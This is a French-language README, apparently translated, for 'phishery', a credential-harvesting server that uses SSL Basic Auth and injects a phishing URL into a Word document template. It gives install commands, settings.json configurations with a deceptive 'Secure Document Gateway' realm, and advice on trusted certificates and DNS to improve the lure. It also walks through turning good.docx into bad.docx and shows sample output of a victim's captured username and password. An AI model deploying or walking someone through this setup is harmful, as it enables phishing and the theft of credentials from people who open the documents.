
Un récolteur d'identifiants avec authentification de base activé par SSL et un injecteur d'URL dans un modèle de document Word
Phishery est un serveur HTTP simple avec SSL dont le but principal est le hameçonnage d'identifiants via l'authentification de base. Phishery offre également la possibilité d'injecter facilement l'URL dans un document Word .docx.

La puissance de phishery est mieux démontrée en définissant le modèle d'un document Word sur une URL phishery. Cela amène Microsoft Word à faire une requête à l'URL, ce qui affiche une boîte de dialogue d'authentification à l'utilisateur final. La possibilité d'injecter n'importe quel fichier .docx avec une URL est possible en utilisant les options -i [in docx], -o [out docx] et -u [url] de phishery.
Des paquets spécifiques au système d'exploitation peuvent être téléchargés depuis ici.
Extrayez l'archive et, éventuellement, installez le binaire dans $PATH
$ tar -xzvf phishery*.tar.gz
$ cd phishery*
$ cp phishery /usr/local/bin
$ phishery --help
|\ \\\\__ O __ _ __
| \_/ o \ o ____ / /_ (_)____/ /_ ___ _______ __
> _ (( <_ oO / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /
| / \__+___/ / /_/ / / / / (__ ) / / / __/ / / /_/ /
|/ |/ / .___/_/ /_/_/____/_/ /_/\___/_/ \__, /
/_/ Basic Auth Credential Harvester (____/
with Word Doc Template Injector
Start the server : phishery -s settings.json -c credentials.json
Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
Options:
-h, --help Show usage and exit.
-v Show version and exit.
-s The JSON settings file used to setup the server. [default: "settings.json"]
-c The JSON file to store harvested credentials. [default: "credentials.json"]
-u The phishery URL to use as the Word document template.
-i The Word .docx file to inject with a template URL.
-o The new Word .docx file with the injected template URL.
Modifiez le fichier settings.json fourni selon vos besoins, par défaut il devrait ressembler à ceci :
{
"ip": "0.0.0.0",
"port": "443",
"sslCert": "server.crt",
"sslKey": "server.key",
"basicRealm": "Secure Document Gateway",
"responseStatus": 200,
"responseFile": "template.dotx",
"responseHeaders": [
["Content-Type", "application/vnd.openxmlformats-officedocument.wordprocessingml.template"]
]
}
Cette configuration démarrera le serveur HTTP sur le port 443 avec SSL configuré pour utiliser server.crt et server.key. Le domaine d'authentification de base est défini sur Secure Document Gateway. Lorsque des identifiants sont fournis, un statut de réponse 200 est envoyé avec le contenu du fichier template.dotx inclus et l'en-tête de type de contenu : Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.template.
Le fichier de paramètres peut également être configuré pour afficher un corps simple, en utilisant responseBody, comme ceci :
{
"ip": "0.0.0.0",
"port": "443",
"sslCert": "server.crt",
"sslKey": "server.key",
"basicRealm": "Secure Document Gateway",
"responseStatus": 404,
"responseBody": "<h1>Not Found</h1>",
"responseHeaders": [
["Content-Type", "text/html"]
]
}
L'efficacité de cet outil repose principalement sur le domaine et le domaine d'authentification de base utilisés, car c'est souvent tout ce que l'utilisateur final verra lorsqu'il est déclenché à partir d'un document Office. Assurez-vous de pointer vos enregistrements DNS A vers l'IP publique du serveur phishery.
Il est recommandé de remplacer le certificat fourni par un certificat de confiance, comme celui généré avec LetsEncrypt. Microsoft Word sur OS X empêchera la boîte de dialogue d'authentification si le certificat est invalide, et Microsoft Word sur Windows invitera l'utilisateur à accepter le certificat invalide.
Une fois le serveur configuré et en cours d'exécution, tout ce que vous avez à faire est d'intégrer une URL phishery dans un document, ou ailleurs où vous le souhaitez. phishery vous donne la possibilité d'injecter votre URL dans un document Word en tant que modèle, les instructions pour le faire se trouvent ci-dessous.
Pour injecter une URL de modèle dans un document Word, vous aurez besoin d'un fichier .docx et de l'URL du serveur phishery.
Exécutez maintenant phishery avec votre document et votre URL :
$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
[+] Opening Word document: good.docx
[+] Setting Word document template to: https://secure.site.local/docs
[+] Saving injected Word document to: bad.docx
[*] Injected Word document has been saved!
Assurez-vous que votre serveur phishery est en cours d'exécution et accessible à l'URL que vous avez utilisée. Maintenant, lorsque le document Word est ouvert, la victime sera invitée avec une boîte de dialogue d'authentification.
Maintenant, lorsque la victime ouvre le document, vous verrez ce qui suit :
$ ./phishery
[+] Credential store initialized at: credentials.json
[+] Starting HTTPS Auth Server on: 0.0.0.0:443
[*] Request Received at 2016-09-25 01:06:28: HEAD https://secure.site.local/docs
[*] Sending Basic Auth response to: 127.0.0.1
[*] New credentials harvested!
[HTTP] Host : secure.example.local
[HTTP] Request : /docs
[HTTP] User Agent : Microsoft Office Word
[HTTP] IP Address : 127.0.0.1
[AUTH] Username : john.doe
[AUTH] Password : Summer15